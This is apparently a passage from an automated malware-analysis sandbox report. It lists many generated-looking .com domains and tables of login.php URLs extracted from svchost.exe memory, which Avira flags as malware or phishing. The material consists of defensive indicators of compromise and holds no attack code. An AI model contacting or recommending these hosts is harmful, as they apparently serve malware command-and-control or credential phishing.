                                                                                                                                                            		unknown
                                                                                                                                                            pupyguq.com
                                                                                                                                                            		unknown
                                                                                                                                                            		unknowntrue
                                                                                                                                                              		unknown
                                                                                                                                                              qedyqal.com
                                                                                                                                                              		unknown
                                                                                                                                                              		unknowntrue
                                                                                                                                                                		unknown
                                                                                                                                                                vowymom.com
                                                                                                                                                                		unknown
                                                                                                                                                                		unknowntrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  purypol.com
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknowntrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    ganypeb.com
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknowntrue
                                                                                                                                                                      		unknown
                                                                                                                                                                      vopymit.com
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        vowyguf.com
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          pupytiq.com
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            lymyfoj.com
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              vowyzuf.com
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                gatyruw.com
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  qebynyg.com
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    puzymev.com
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      pupymol.com
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        vojycif.com
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          qebyvyl.com
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            lymysan.com
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknowntrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              qekynuq.com
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                puryjil.com
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  puvytuv.com
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    galyzus.com
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      gadyfuh.com
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        vofycyk.com
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          lyxywer.com
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            Contacted URLs

                                                                                                                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                            https://puzylyp.com/login.phptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-4491-9018-901015a08e06true
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://galyqaz.com/login.phptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            URLs from Memory and Binaries

                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                            http://qedytul.com/svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546391419.000000000602A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://galyryz.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://purymuq.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopycoc.com/login.phpsvchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658175800.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660127068.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopycom.com/login.phpsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gatyviw.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vonymuf.com/login.phpcom/login.phpsvchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qegyryq.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://purycap.com/login.phpsvchost.exe, 00000002.00000003.1807684932.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686150606.0000000002955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1701312723.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798156248.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663699181.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1728166475.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720674945.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzylyp.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2658895836.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojyjyc.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://ganyzub.com/login.phpsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqyxov.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowydef.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyrywoj.com/login.phpsvchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumyjig.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puvywav.com/svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygyxun.com/login.phpsvchost.exe, 00000002.00000003.1547180269.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyvax.com/login.phpsvchost.exe, 00000002.00000003.1657651816.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658175800.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670053722.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658387523.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670914897.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzytul.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078075418.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocygim.com/svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadykos.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocyruk.com/login.phpsvchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygysij.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qekyhil.com/login.phpsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vofydac.com/login.phpsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
